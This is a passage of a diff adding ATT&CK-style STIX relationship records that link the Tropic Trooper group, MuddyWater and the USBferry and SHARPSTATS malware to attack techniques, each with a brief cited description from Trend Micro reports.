+ "id": "relationship--b45e744d-f9c3-4469-a410-137f1802536f",
+ "type": "relationship",
+ "modified": "2020-05-29T13:31:07.773Z",
+ "created": "2020-05-20T19:54:06.589Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "target_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[USBferry](https://attack.mitre.org/software/S0452) can check for connected USB devices.(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--57e57dc4-b813-4e5c-882a-0021c7e0ff22",
+ "type": "relationship",
+ "modified": "2020-05-29T13:31:07.787Z",
+ "created": "2020-05-20T19:54:06.591Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[USBferry](https://attack.mitre.org/software/S0452) can detect the infected machine's network topology using ipconfig and arp.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--74ade1b3-d2d8-4537-87da-41f54346a149",
+ "type": "relationship",
+ "modified": "2020-05-29T13:31:07.831Z",
+ "created": "2020-05-20T19:54:06.596Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[USBferry](https://attack.mitre.org/software/S0452) can detect the victim's file or folder list.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--416c98b4-221d-4e2f-aed4-43b844a89ad0",
+ "type": "relationship",
+ "modified": "2020-05-29T13:31:07.840Z",
+ "created": "2020-05-20T19:54:06.598Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[USBferry](https://attack.mitre.org/software/S0452) can execute various Windows commands.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--8e1c15c8-ba96-47b8-9feb-fade45d7fcf9",
+ "type": "relationship",
+ "modified": "2020-05-29T13:31:07.848Z",
+ "created": "2020-05-20T19:54:06.600Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "target_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[USBferry](https://attack.mitre.org/software/S0452) can copy its installer to attached USB storage devices.(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--93bea600-6a8d-4f58-acf3-e7d604eeb451",
+ "type": "relationship",
+ "modified": "2020-05-29T13:31:07.893Z",
+ "created": "2020-05-20T19:54:06.621Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
+ "target_ref": "malware--73c4711b-407a-449d-b269-e3b1531fe7a9",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--b9decd90-60fa-4edc-b428-70e94d6d8207",
+ "type": "relationship",
+ "modified": "2020-05-20T20:39:29.132Z",
+ "created": "2020-05-20T20:39:29.132Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used JPG files with encrypted payloads to mask their backdoor routines and evade detection.(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--e35f5636-2ae8-4ab7-9851-73410e6a58d0",
+ "type": "relationship",
+ "modified": "2020-05-21T16:56:20.629Z",
+ "created": "2020-05-21T12:59:00.496Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used a delivered trojan to download additional files.(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--0f47a6e7-af7e-4e23-a401-4dec08da4e64",
+ "type": "relationship",
+ "modified": "2020-05-21T16:39:27.637Z",
+ "created": "2020-05-21T12:59:00.513Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has attempted to transfer [USBferry](https://attack.mitre.org/software/S0452) from an infected USB device by copying an Autorun function to the target machine.(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--fded4f08-6cb0-4259-a6a9-f0d62537164f",
+ "type": "relationship",
+ "modified": "2020-05-21T16:56:20.633Z",
+ "created": "2020-05-21T12:59:00.515Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1b5dbd72-abeb-4d61-9a7f-917a17f272d1",
+ "type": "relationship",
+ "modified": "2020-05-21T12:59:00.698Z",
+ "created": "2020-05-21T12:59:00.698Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--73c4711b-407a-449d-b269-e3b1531fe7a9",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[SHARPSTATS](https://attack.mitre.org/software/S0450) has used base64 encoding and XOR to obfuscate PowerShell scripts.(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--b5952b5f-281b-4ff4-9cfb-c2898f3028cc",
+ "type": "relationship",
+ "modified": "2020-05-21T13:12:36.932Z",
+ "created": "2020-05-21T13:12:36.932Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used base64 encoding to hide command strings delivered from the C2.(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--91180074-16cd-448f-8955-628d06965e22",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.169Z",
+ "created": "2020-05-21T14:55:00.169Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has started a web service in the target host and wait for the adversary to connect, acting as a web shell.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--6a063d3a-cad2-4649-93a4-d1931ae6aaaf",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.172Z",
+ "created": "2020-05-21T14:55:00.172Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used multiple Windows APIs including HttpInitialize, HttpCreateHttpHandle, and HttpAddUrl.(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--73499911-3b9f-443e-b522-f0d1434f2eb6",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.174Z",
+ "created": "2020-05-21T14:55:00.174Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has encrypted traffic with the C2 to prevent network detection.(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--3089fe6b-36d6-4890-b70b-1a76f55c84ff",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.182Z",
+ "created": "2020-05-21T14:55:00.182Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081)'s backdoor has communicated to the C2 over the DNS protocol.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--af9e92df-d4d0-437a-9114-823b6a2a14a6",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.198Z",
+ "created": "2020-05-21T14:55:00.198Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081)'s backdoor could list the infected system's installed software.(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f79c163a-25c0-4694-b1ca-50ab1eda8651",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.229Z",
+ "created": "2020-05-21T14:55:00.229Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has hidden payloads in Flash directories and fake installer files.(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--8a2a70a5-044d-4869-9d11-10499c8848bc",
+ "type": "relationship",
+ "modified": "2020-05-21T16:56:20.619Z",
+ "created": "2020-05-21T14:55:00.231Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used known administrator account credentials to execute the backdoor directly.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--95122d43-9de8-4eef-bc46-6fdc5cc276a9",
+ "type": "relationship",
+ "modified": "2020-05-21T18:57:34.554Z",
+ "created": "2020-05-21T14:55:00.233Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used a copy function to automatically exfiltrate sensitive data from air-gapped systems using USB storage.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--c4f1371c-8f23-49b7-9572-d226ee2dbade",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.235Z",
+ "created": "2020-05-21T14:55:00.235Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has exfiltrated data using USB storage devices.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--6971d7f3-8161-4399-b587-acab5d8820f1",
+ "type": "relationship",
+ "modified": "2020-05-21T18:57:34.625Z",
+ "created": "2020-05-21T14:55:00.262Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has monitored files' modified time.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--78731c00-1f22-4dab-a3cd-d19fac57e82f",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.279Z",
+ "created": "2020-05-21T14:55:00.279Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has collected information automatically using the adversary's [USBferry](https://attack.mitre.org/software/S0452) attack.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--b3dd4e4e-0bb8-4487-8336-b5d9024045eb",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.281Z",
+ "created": "2020-05-21T14:55:00.281Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "description": "Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019.",
+ "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-tropic-trooper.pdf",
+ "source_name": "TrendMicro TropicTrooper 2015"
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has detected a target system\u2019s OS version and system volume information.(Citation: TrendMicro TropicTrooper 2015)(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--cd5799f3-8be5-4272-88db-626940136130",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.290Z",
+ "created": "2020-05-21T14:55:00.290Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used scripts to collect the host's network topology.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--6512ebc3-cc9f-48e1-9a57-a5deb062f123",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.293Z",
+ "created": "2020-05-21T14:55:00.293Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
